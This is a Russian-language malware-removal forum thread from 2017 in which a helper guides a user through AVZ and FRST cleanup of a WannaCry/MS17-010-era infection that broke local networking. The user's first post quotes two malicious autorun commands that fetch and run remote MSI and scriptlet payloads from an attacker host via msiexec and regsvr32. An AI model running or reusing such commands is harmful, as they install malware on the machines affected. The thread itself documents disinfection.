Нет сети, но интернет есть

**Волокитин** · 22.05.2017, 14:42

Пропала сеть на 4 компьютерах, но интернет по этому же кабелю раздается нормально.
Проверка настроек ни к чему не привела, сети так и нет. С одного раздающего интернет компьютера видно все компы, но другие его не видят. пинг нормальный без потерь во все стороны.
В автозагрузке появились пункты "msiexec.exe /i http://js.mykings.top:280/helloworld.msi/q" и "regsvr32 /u/s/i:http://js.mykings.top:280/v.sct scrobj.dll", отключение не помогло.
ттак же др.веб поймал mssecsvc.exe и 3165616.exe.
Еще появился файл hosts.ics, удаление его не помогает, после перезагрузки он снова появляется.
Также есть еще одна сеть на 8 компов, с такими же симптомами.
Настройки сети тыщу раз перепроверялись но бестолку. Антивирус Др.Веб и MBAM ничего больше не находят.
Думаю вирус. помогите пожалуйста!

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

**Info_bot** · 22.05.2017, 14:45

Уважаемый(ая) Волокитин, спасибо за обращение на наш форум!

Помощь при заражении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы, в самое ближайшее время, ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

Информация

Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

**Волокитин** · 23.05.2017, 12:59

Также был пойман "майнер" примерно после того как пропала сеть. Название сказать не смогу он был удален

**Vvvyg** · 24.05.2017, 20:41

Выполните скрипт в AVZ:

Код:

begin
 SearchRootkit(true, true);
 SetAVZGuardStatus(True);
 QuarantineFile('C:\Windows\Fonts\sppsrv.exe', '');
 QuarantineFile('C:\Windows\Fonts\sppsrv.exe0', '');
 DeleteFile('C:\Windows\Fonts\sppsrv.exe', '32');
 DeleteFile('C:\Windows\Fonts\sppsrv.exe0', '32');
 DeleteService('clr_optimization_v4.0.30339');
 RegKeyParamDel('HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\start', 'command');
 RegKeyParamDel('HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\start1', 'command');
BC_ImportALL;
ExecuteSysClean;
BC_Activate;
RebootWindows(true);
end.

Компьютер перезагрузится.

Выполните в AVZ скрипт:

Код:

begin
CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
end.

В папке с AVZ появится архив карантина quarantine.zip, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.

Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
Кроме уже установленных, отметьте галочками также "90 Days Files".

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
Прикрепите эти файлы к своему следующему сообщению (можно все в одном архиве).

**Волокитин** · 25.05.2017, 14:54

Вот результаты, надеюсь это поможет. А то в сети односторонняя связь, проблемный комп видит всех, а его то не видят, то нет доступа. Перенастройка сети не помогает. Остается надеяться, что это результат работы вируса, и вы поможете мне с ним справиться

**Vvvyg** · 25.05.2017, 19:55

Запустите FRST/FRST64. Нажмите комбинацию Ctrl+Y - откроется Блокнот. Скопируйте в него следующий код:

Код:

CreateRestorePoint:
HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{6eda678c-e13d-47f4-9701-3566fc86f7e2} <======= ATTENTION (Restriction - IP)
2017-05-25 14:40 - 2015-05-29 12:29 - 00000393 _____ C:\Windows\system32\Drivers\etc\hosts.ics
2016-04-13 12:23 - 2016-04-13 12:32 - 8424038 _____ (Igor Pavlov) C:\Users\MSSQLSERVER\AppData\Local\Temp\istt.exe
2015-05-29 15:36 - 2013-07-01 17:37 - 40682928 _____ () C:\Users\user\AppData\Local\Temp\ap_setup.exe
2017-05-18 11:30 - 2017-05-19 13:06 - 00000060 _____ C:\Windows\system32\s
2017-05-18 10:30 - 2017-05-18 10:30 - 00000005 _____ C:\Windows\system32\1.txt
WMI_ActiveScriptEventConsumer_fuckyoumm2_consumer_disabled: 
FirewallRules: [{18E32515-FFB0-4281-BA02-8899D8C7B2AC}] => (Block) LPort=445
Reboot:

Сохраните (Ctrl+S) и закройте.
Отключите до перезагрузки антивирус, в FRST нажмите Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.

Сообщите, что с проблемой.

**Волокитин** · 26.05.2017, 09:54

После выполнения FRST -> fix, в Сети стали отображаться только устройства мультимедиа, но принтер который работал по сети и был подключен к проблемному компу теперь печатает по сети без проблем. Другие компьютеры также не видят этот проблемный комп через "мой компьютер"-> "сеть", если набрать а адресной строке адреса компьютеров типа \\192.168.137.1 ...... 4 то сеть открывается.
Уже радует что принтер заработал о сети. спасибо! посоветуйте что сделать чтобы открывалась сеть через мой компьютер.

- - - - -Добавлено - - - - -

Так что же это было, вирус,его последствия?
Есть еще одна сеть на 8 компьютеров, там такая же проблема. Раздающий комп видит всё, а его никто не видит. Мне создать новую тему и в ней прикреплять логи, или это можно исправить руками?

**Vvvyg** · 26.05.2017, 19:47

Боюсь, сперва придётся вирус и его последствия устранять и на других. И в отдельных темах.

Скачайте Windows Repair (All In One), распакуйте, запустите, закладка "Repairs", "Open Repairs", отметьте пункты:
13 "Repair network"
26 "Restore Important Windows Services"
27 "Set Windows Services To Default Startup"
и нажмите "Start Repairs".

После перезагрузки проверяйте работу сети.

**Волокитин** · 29.05.2017, 14:35

winows repair еще не пробовал, чет боюсь что сбросится все и опять работать не будет. Можно ли отменить изменения сделанные windows repair?

В принципе в этой сети нужен только интернет и принтер сетевой, доступ к другим компьютерам не используется, можно и в ручном режиме прописывать адрес и заходить на другой комп.

А по другой сети с такими же симптомами создал тему https://virusinfo.info/showthread.php?t=212551, надеюсь поможете справиться и с этой проблемой! Спасибо!

**Vvvyg** · 29.05.2017, 21:28

Отменить изменения в windows repair можно, по умолчанию утилита предлагает бэкап реестра.

Но сперва ознакомьтесь со рекомендациями и выполните их в обязательном порядке для всех компьютеров, весьма вероятно, что в сети атакует WannaCry или другой зловред, использующий ту же уязвимость.

**Волокитин** · 30.05.2017, 13:41

Сейчас не могу скачать WannaCryDefenderLocal, для нашего интернета это много(512 кбит/с, и на этом канале 10 компов), к вечеру скачаю дома и попробую

**Vvvyg** · 30.05.2017, 19:52

Скачайте заодно и обновления для всех систем: Microsoft Security Bulletin MS17-010 - Critical.

**Волокитин** · 31.05.2017, 12:47

Да я сразу установил обновление kb 04012212, как только появились проблемы с сетью

**Vvvyg** · 31.05.2017, 18:33

На все компьютеры, Как сейчас ситуация?

**Волокитин** · 02.06.2017, 11:22

Неделю все работало хорошо. Правда windows repair я так и не запускал, главное принтер работает и все рады. Сегодня опять пропал принтер сетевой. Повторил опять скрипт в frst и принтер вернулся. Может быть в логе будет видно какая зараза опять активизировалась.

**Vvvyg** · 02.06.2017, 20:39

Был только hosts.ics.

Загрузите, распакуйте на Рабочий стол и запустите SecurityCheck by glax24 & Severnyj.
Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запуск от имени администратора (если Вы используете Windows Vista/7/8/10).
Если увидите предупреждение от фаервола относительно программы SecurityCheck, не блокируйте ее работу.
Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt;
Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt.

Приложите этот файл к своему следующему сообщению.

**Волокитин** · 05.06.2017, 13:51

Вот результат проверки. сегодня принтер работает нормально. а файл hosts.ics пересоздается при каждом запуске системы, незнаю влияет ли он на работу сети

**Vvvyg** · 05.06.2017, 20:09

Если отключить скрытые общие ресурсы (ADMIN$, C$, D$) - будет появляться hosts.ics?

**Волокитин** · 07.06.2017, 12:44

На компьютере нет записей AutoShareServer,AutoShareWks, как отключить эти параметры в windows 7 профессиональная

**Vvvyg** · 07.06.2017, 20:00

Если нет - значит шары закрыты, а AVZ ошибается. hosts.ics так и появляется? Его содержимое покажите.

Нет сети, но интернет есть (заявка № 212346)

Опции темы